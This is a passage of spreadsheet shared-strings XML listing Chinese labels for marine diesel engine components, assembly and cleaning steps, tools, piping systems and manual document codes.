  </si>
  <si>
    <t xml:space="preserve">外螺纹L型接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力表板安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">接线箱部件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">频率/电流转换器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">电缆接头安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">仪表面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外部接线图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">传感器连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">WOODWARD调速器                                       </t>
  </si>
  <si>
    <t xml:space="preserve">插销扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">方头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">拉伸器安装工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压紧手柄                                              </t>
  </si>
  <si>
    <t xml:space="preserve">数据表                                               </t>
  </si>
  <si>
    <t>防护螺栓</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">卡爪                                                </t>
  </si>
  <si>
    <t xml:space="preserve">带刹车的滑车                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑车刹车                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆鼻形工具，右侧                                          </t>
  </si>
  <si>
    <t xml:space="preserve">圆鼻形工具，左侧                                          </t>
  </si>
  <si>
    <t xml:space="preserve">成形工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮工具，前后法兰                                         </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">倒置刮修工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">倒置多底                                              </t>
  </si>
  <si>
    <t xml:space="preserve">销规伸长                                              </t>
  </si>
  <si>
    <t xml:space="preserve">量块列表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">厚薄规                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧样板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吊具                                                </t>
  </si>
  <si>
    <t xml:space="preserve">特殊形状软管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高压软管组件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带2个联轴节的软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">带1个联轴节的软管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">直钢管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺母接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带螺纹的漏斗                                            </t>
  </si>
  <si>
    <t xml:space="preserve">圆垫圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">矩形垫圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">特殊密封环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">杯形密封                                              </t>
  </si>
  <si>
    <t xml:space="preserve">粘接剂使用说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">长螺栓+螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀插头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">蝶阀阀门                                              </t>
  </si>
  <si>
    <t xml:space="preserve">针阀组                                               </t>
  </si>
  <si>
    <t xml:space="preserve">均衡阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">预期噪声等级                                            </t>
  </si>
  <si>
    <t xml:space="preserve">流量控制量杯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">组装说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">接头，安装说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气动扭力扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">灯泡                                                </t>
  </si>
  <si>
    <t xml:space="preserve">光管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">照明灯                                               </t>
  </si>
  <si>
    <t>7A0001</t>
  </si>
  <si>
    <t>7A0011</t>
  </si>
  <si>
    <t>7A0022</t>
  </si>
  <si>
    <t>7A0110</t>
  </si>
  <si>
    <t>7A0120</t>
  </si>
  <si>
    <t>7A0200</t>
  </si>
  <si>
    <t>7A0210</t>
  </si>
  <si>
    <t>7A0225</t>
  </si>
  <si>
    <t>7A0290</t>
  </si>
  <si>
    <t>7A0294</t>
  </si>
  <si>
    <t>7A0401</t>
  </si>
  <si>
    <t>7A1000</t>
  </si>
  <si>
    <t>7A1001</t>
  </si>
  <si>
    <t>7A1030</t>
  </si>
  <si>
    <t>7A1100</t>
  </si>
  <si>
    <t>7A1110</t>
  </si>
  <si>
    <t>7A1120</t>
  </si>
  <si>
    <t>7A1121</t>
  </si>
  <si>
    <t>7A1122</t>
  </si>
  <si>
    <t>7A1123</t>
  </si>
  <si>
    <t>7A1129</t>
  </si>
  <si>
    <t>7A1130</t>
  </si>
  <si>
    <t>7A1200</t>
  </si>
  <si>
    <t>7A1201</t>
  </si>
  <si>
    <t>7A2010</t>
  </si>
  <si>
    <t>7A2101</t>
  </si>
  <si>
    <t>7A2103</t>
  </si>
  <si>
    <t>7A2104</t>
  </si>
  <si>
    <t>7A2107</t>
  </si>
  <si>
    <t>7A2202</t>
  </si>
  <si>
    <t>7A2206</t>
  </si>
  <si>
    <t>7A2252</t>
  </si>
  <si>
    <t>7A2257</t>
  </si>
  <si>
    <t>7A2306</t>
  </si>
  <si>
    <t>7A2307</t>
  </si>
  <si>
    <t>7A3003</t>
  </si>
  <si>
    <t>7A3009</t>
  </si>
  <si>
    <t>7A3060</t>
  </si>
  <si>
    <t>7A3063</t>
  </si>
  <si>
    <t>7A3070</t>
  </si>
  <si>
    <t xml:space="preserve">夹箍安装                                              </t>
  </si>
  <si>
    <t>7A3089</t>
  </si>
  <si>
    <t>7A3091</t>
  </si>
  <si>
    <t>7A3109</t>
  </si>
  <si>
    <t>7A3204</t>
  </si>
  <si>
    <t>7A3205</t>
  </si>
  <si>
    <t>7A3209</t>
  </si>
  <si>
    <t>7A3211</t>
  </si>
  <si>
    <t>7A3220</t>
  </si>
  <si>
    <t>7A3221</t>
  </si>
  <si>
    <t>7A3254</t>
  </si>
  <si>
    <t>7A3255</t>
  </si>
  <si>
    <t>7A3256</t>
  </si>
  <si>
    <t>7A3260</t>
  </si>
  <si>
    <t>7A3261</t>
  </si>
  <si>
    <t>7A3280</t>
  </si>
  <si>
    <t>7A4001</t>
  </si>
  <si>
    <t>7A4004</t>
  </si>
  <si>
    <t>7A4005</t>
  </si>
  <si>
    <t>7A4006</t>
  </si>
  <si>
    <t>7A4009</t>
  </si>
  <si>
    <t>7A4020</t>
  </si>
  <si>
    <t>7A4021</t>
  </si>
  <si>
    <t>7A4061</t>
  </si>
  <si>
    <t>7A4062</t>
  </si>
  <si>
    <t>7A4101</t>
  </si>
  <si>
    <t>7A4102</t>
  </si>
  <si>
    <t>7A4103</t>
  </si>
  <si>
    <t>7A4182</t>
  </si>
  <si>
    <t>7A4201</t>
  </si>
  <si>
    <t>7B9000</t>
  </si>
  <si>
    <t xml:space="preserve">箱子装配                                              </t>
  </si>
  <si>
    <t>7B9001</t>
  </si>
  <si>
    <t xml:space="preserve">传感器装配                                             </t>
  </si>
  <si>
    <t>7B9002</t>
  </si>
  <si>
    <t>7B9100</t>
  </si>
  <si>
    <t>7B9101</t>
  </si>
  <si>
    <t>7B9102</t>
  </si>
  <si>
    <t>7B9200</t>
  </si>
  <si>
    <t>7B9201</t>
  </si>
  <si>
    <t>7B9202</t>
  </si>
  <si>
    <t>7B9300</t>
  </si>
  <si>
    <t>7B9301</t>
  </si>
  <si>
    <t>7B9302</t>
  </si>
  <si>
    <t>7B9400</t>
  </si>
  <si>
    <t>7B9401</t>
  </si>
  <si>
    <t>7B9402</t>
  </si>
  <si>
    <t>7B9500</t>
  </si>
  <si>
    <t>7B9501</t>
  </si>
  <si>
    <t>7B9502</t>
  </si>
  <si>
    <t xml:space="preserve">机座对中铰孔                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座剖面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">下轴瓦和曲轴检查                                          </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴和飞轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴颈排列                                              </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环保护孔                                            </t>
  </si>
  <si>
    <t xml:space="preserve">保护前端孔+固定                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架/横梁铰孔对中                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机座/机架铰孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支柱螺丝孔                                             </t>
  </si>
  <si>
    <t xml:space="preserve">盖子+安全阀安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">导板对中+铰孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">长贯穿螺栓+铁支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄轴承+连杆                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄轴承/连杆                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体和机架对中                                          </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承测量                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套壳体+换向机构                                       </t>
  </si>
  <si>
    <t xml:space="preserve">短贯穿螺栓安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞安装和找中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套和凸轮轴箱对中                                       </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄轴承检查                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条安装和调整                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却和出口管安装                                        </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖和冷却水管安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖+各种阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀驱动齿轮-燃油泵                                         </t>
  </si>
  <si>
    <t xml:space="preserve">控制轴对中+销                                           </t>
  </si>
  <si>
    <t xml:space="preserve">注油器+调速器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体安装对中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体铰孔装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵+自动换向                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架框架拆卸                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架机座对中                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶部拆卸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶部组装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶部框架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧+导向安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">顶环+刮油环保护钻孔                                        </t>
  </si>
  <si>
    <t xml:space="preserve">上部导轨                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体/缸套成品                                          </t>
  </si>
  <si>
    <t xml:space="preserve">内部电缆槽                                             </t>
  </si>
  <si>
    <t xml:space="preserve">最终组装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安装轴承监控系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器和集管安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">各种温度计体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">水力测功器对中                                           </t>
  </si>
  <si>
    <t xml:space="preserve">测试用油和水                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测试完成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">标准检查                                              </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">发运时重新组装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧中层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后侧中层走台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧上层走台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后侧上层走台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴上的力矩补偿器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">运行后的操作余量                                          </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器定位销安装拆卸                                        </t>
  </si>
  <si>
    <t xml:space="preserve">部件拆包                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部件取出和组装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上层清洗                                              </t>
  </si>
  <si>
    <t xml:space="preserve">最终组装时清洁                                           </t>
  </si>
  <si>
    <t xml:space="preserve">入级备件和工具列表                                         </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机安装用填料                                          </t>
  </si>
  <si>
    <t xml:space="preserve">试运行前清洁                                            </t>
  </si>
  <si>
    <t xml:space="preserve">清洁机架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">清洁柴油机                                             </t>
  </si>
  <si>
    <t xml:space="preserve">清洁上部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">清洁气缸体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">清洁机座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">清洁机架框架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">不带补偿器运行                                           </t>
  </si>
  <si>
    <t xml:space="preserve">装配截面供应图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">测试图号                                              </t>
  </si>
  <si>
    <t xml:space="preserve">船级社                                               </t>
  </si>
  <si>
    <t xml:space="preserve">增压器信息                                             </t>
  </si>
  <si>
    <t xml:space="preserve">直列机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">V形机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">V型电站发动机                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机性能                                             </t>
  </si>
  <si>
    <t xml:space="preserve">废气数据                                              </t>
  </si>
  <si>
    <t xml:space="preserve">附带离心泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">十字头发动机                                            </t>
  </si>
  <si>
    <t xml:space="preserve">质量程序                                              </t>
  </si>
  <si>
    <t xml:space="preserve">质量规范                                              </t>
  </si>
  <si>
    <t xml:space="preserve">检查规范                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油品质                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机说明                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油规格                                              </t>
  </si>
  <si>
    <t xml:space="preserve">焊接检查                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管子焊接指导                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳内滑油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">钢板下料清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座-铸件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">铸造机架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">焊接机架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铸造扫气箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接扫气箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">框架盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">铸造中间机架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接中间机架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架端部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">全焊接机架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">全铸造机架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架其它部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导板和盖子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架端导板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴向振动解调器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">整体式曲轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">组合式曲轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">整体锻造曲轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞带活塞杆                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂和支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">液压阀齿轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵+排气阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀齿轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链条驱动下部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构和链条                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链条和链轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">换向（液压）                                            </t>
  </si>
  <si>
    <t xml:space="preserve">标准仪表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">转速表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">温度表和压力表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">水柱压力表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制排水                                              </t>
  </si>
  <si>
    <t xml:space="preserve">静压力布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">23和45部套控制系统                                       </t>
  </si>
  <si>
    <t xml:space="preserve">部套24                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部套26                                              </t>
  </si>
  <si>
    <t xml:space="preserve">45部套控制系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">泵和自动装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">部套30                                              </t>
  </si>
  <si>
    <t xml:space="preserve">38部套示功阀驱动机构                                       </t>
  </si>
  <si>
    <t xml:space="preserve">54部套示功阀驱动机构                                       </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀机构                                             </t>
  </si>
  <si>
    <t xml:space="preserve">40和56部套扫气管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">部套44和66                                           </t>
  </si>
  <si>
    <t xml:space="preserve">部套94                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压空气管-上                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压空气管-下                                           </t>
  </si>
  <si>
    <t xml:space="preserve">备用鼓风机                                             </t>
  </si>
  <si>
    <t xml:space="preserve">部套41                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部套141                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">振动报警订购清单                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气管工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器喷嘴清洗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">部套17                                              </t>
  </si>
  <si>
    <t xml:space="preserve">58部套飞轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">59部套盘车机                                           </t>
  </si>
  <si>
    <t xml:space="preserve">盘车安全设备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">63部套气缸注油器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">部套43和92                                           </t>
  </si>
  <si>
    <t xml:space="preserve">部套93                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部套142                                             </t>
  </si>
  <si>
    <t xml:space="preserve">部套143                                             </t>
  </si>
  <si>
    <t xml:space="preserve">42部套空冷器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">93部套空冷器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">部套52和85                                           </t>
  </si>
  <si>
    <t xml:space="preserve">部套51和82                                           </t>
  </si>
  <si>
    <t xml:space="preserve">部套47                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部套48                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部套49                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部套50                                              </t>
  </si>
  <si>
    <t xml:space="preserve">部套148                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧下层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧下层平台布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">71部套推力轴承                                          </t>
  </si>
  <si>
    <t xml:space="preserve">顺时针推力轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">逆时针推力轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">顺时针推力块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">逆时针推力块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">后端管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">侧端管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器冷却油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">报警系统安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油回油主管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀冷却油主管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀泄放保护                                           </t>
  </si>
  <si>
    <t xml:space="preserve">前端滑油管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴出口主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">集中润滑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管泄放                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">中央润滑-下部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱透气                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑支管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器管系                                         </t>
  </si>
  <si>
    <t xml:space="preserve">启动系统布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀冷却水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却水泄放主管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">缸套冷却水管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却水进口主管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">海水冷却水主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">901部套—缸盖工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">903部套—缸套工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">904部套—十字头连杆工具                                     </t>
  </si>
  <si>
    <t xml:space="preserve">905部套—曲轴推力轴承工具                                    </t>
  </si>
  <si>
    <t xml:space="preserve">906部套—操纵机构工具                                      </t>
  </si>
  <si>
    <t xml:space="preserve">907部套—启动空气系统工具                                    </t>
  </si>
  <si>
    <t xml:space="preserve">908部套—排气阀工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">909部套—燃油系统工具                                      </t>
  </si>
  <si>
    <t xml:space="preserve">911部套—安全设备工具                                      </t>
  </si>
  <si>
    <t xml:space="preserve">912部套—大件装配工具                                      </t>
  </si>
  <si>
    <t xml:space="preserve">913部套—通用工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">925部套—液压工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">转子和扩压器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴总成和转子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮进口和出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">静止部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">98部套空气分配器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">部套57                                              </t>
  </si>
  <si>
    <t xml:space="preserve">CO2灭火系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽灭火系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">水雾灭火系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">说明书                                               </t>
  </si>
  <si>
    <t>CA0000</t>
  </si>
  <si>
    <t xml:space="preserve">日志首页                                              </t>
  </si>
  <si>
    <t>CA0010</t>
  </si>
  <si>
    <t xml:space="preserve">日志第一卷首页                                           </t>
  </si>
  <si>
    <t>CA0011</t>
  </si>
  <si>
    <t xml:space="preserve">日志第二卷首页                                           </t>
  </si>
  <si>
    <t>CA0012</t>
  </si>
  <si>
    <t xml:space="preserve">日志第三卷首页                                           </t>
  </si>
  <si>
    <t>CA0013</t>
  </si>
  <si>
    <t>CA0020</t>
  </si>
  <si>
    <t xml:space="preserve">说明第一卷                                             </t>
  </si>
  <si>
    <t>CA0021</t>
  </si>
  <si>
    <t xml:space="preserve">说明第二卷                                             </t>
  </si>
  <si>
    <t>CA0022</t>
  </si>
  <si>
    <t xml:space="preserve">说明第三卷                                             </t>
  </si>
  <si>
    <t>CA0023</t>
  </si>
  <si>
    <t xml:space="preserve">描述和比较，第三卷                                         </t>
  </si>
  <si>
    <t>CA0030</t>
  </si>
  <si>
    <t xml:space="preserve">目录                                                </t>
  </si>
  <si>
    <t>CA0040</t>
  </si>
  <si>
    <t xml:space="preserve">检查和维护计划                                           </t>
  </si>
  <si>
    <t>CA0050</t>
  </si>
  <si>
    <t xml:space="preserve">安全措施                                              </t>
  </si>
  <si>
    <t>CA0060</t>
  </si>
  <si>
    <t xml:space="preserve">章节索引                                              </t>
  </si>
  <si>
    <t>CA0999</t>
  </si>
  <si>
    <t xml:space="preserve">说明书第一卷                                            </t>
  </si>
  <si>
    <t>CA1000</t>
  </si>
  <si>
    <t xml:space="preserve">说明书第二卷                                            </t>
  </si>
  <si>
    <t>CA2000</t>
  </si>
  <si>
    <t>CA2093</t>
  </si>
  <si>
    <t xml:space="preserve">说明，卷二                                             </t>
  </si>
  <si>
    <t>CA2905</t>
  </si>
  <si>
    <t xml:space="preserve">说明书，卷三                                            </t>
  </si>
  <si>
    <t>CA3000</t>
  </si>
  <si>
    <t xml:space="preserve">说明，卷三                                             </t>
  </si>
  <si>
    <t>CA3905</t>
  </si>
  <si>
    <t xml:space="preserve">日志卷一-卷三首页                                         </t>
  </si>
  <si>
    <t>CA9001</t>
  </si>
  <si>
    <t xml:space="preserve">说明，卷一、二、三                                         </t>
  </si>
  <si>
    <t>CA9002</t>
  </si>
  <si>
    <t xml:space="preserve">气缸注油器                                             </t>
  </si>
  <si>
    <t>CD0302</t>
  </si>
  <si>
    <t xml:space="preserve">往复运动部件                                            </t>
  </si>
  <si>
    <t>CD0403</t>
  </si>
  <si>
    <t xml:space="preserve">曲轴甩档                                              </t>
  </si>
  <si>
    <t>CD0501</t>
  </si>
  <si>
    <t>CD0507</t>
  </si>
  <si>
    <t>CD0508</t>
  </si>
  <si>
    <t>CD0604</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮更换                                              </t>
  </si>
  <si>
    <t>CD0606</t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴接头                                             </t>
  </si>
  <si>
    <t>CD0608</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮驱动                                              </t>
  </si>
  <si>
    <t>CD0620</t>
  </si>
  <si>
    <t xml:space="preserve">液压泵                                               </t>
  </si>
  <si>
    <t>CD0621</t>
  </si>
  <si>
    <t xml:space="preserve">液压系统                                              </t>
  </si>
  <si>
    <t>CD0622</t>
  </si>
  <si>
    <t>CD0623</t>
  </si>
  <si>
    <t>CD0624</t>
  </si>
  <si>
    <t>CD0625</t>
  </si>
  <si>
    <t>CD0626</t>
  </si>
  <si>
    <t xml:space="preserve">特殊运行                                              </t>
  </si>
  <si>
    <t>CD0628</t>
  </si>
  <si>
    <t xml:space="preserve">启动空气阀                                             </t>
  </si>
  <si>
    <t>CD0702</t>
  </si>
  <si>
    <t>CD0801</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀驱动器                                            </t>
  </si>
  <si>
    <t>CD0803</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀滚轮导筒                                           </t>
  </si>
  <si>
    <t>CD0804</t>
  </si>
  <si>
    <t>CD0805</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀运行开启                                           </t>
  </si>
  <si>
    <t>CD0806</t>
  </si>
  <si>
    <t xml:space="preserve">排气阀特殊运行                                           </t>
  </si>
  <si>
    <t>CD0807</t>
  </si>
  <si>
    <t xml:space="preserve">油泵设定                                              </t>
  </si>
  <si>
    <t>CD0901</t>
  </si>
  <si>
    <t xml:space="preserve">VIT系统                                             </t>
  </si>
  <si>
    <t>CD0902</t>
  </si>
  <si>
    <t>CD0903</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵顶盖                                             </t>
  </si>
  <si>
    <t>CD0905</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵偶件安装                                           </t>
  </si>
  <si>
    <t>CD0906</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵吸油阀                                            </t>
  </si>
  <si>
    <t>CD0907</t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵泄放阀                                            </t>
  </si>
  <si>
    <t>CD0908</t>
  </si>
  <si>
    <t xml:space="preserve">油泵缓冲器                                             </t>
  </si>
  <si>
    <t>CD0909</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮滚轮导套提升工具                                        </t>
  </si>
  <si>
    <t>CD0910</t>
  </si>
  <si>
    <t xml:space="preserve">泵单向阀                                              </t>
  </si>
  <si>
    <t>CD0913</t>
  </si>
  <si>
    <t>CD0914</t>
  </si>
  <si>
    <t xml:space="preserve">油泵滚轮导筒                                            </t>
  </si>
  <si>
    <t>CD0915</t>
  </si>
  <si>
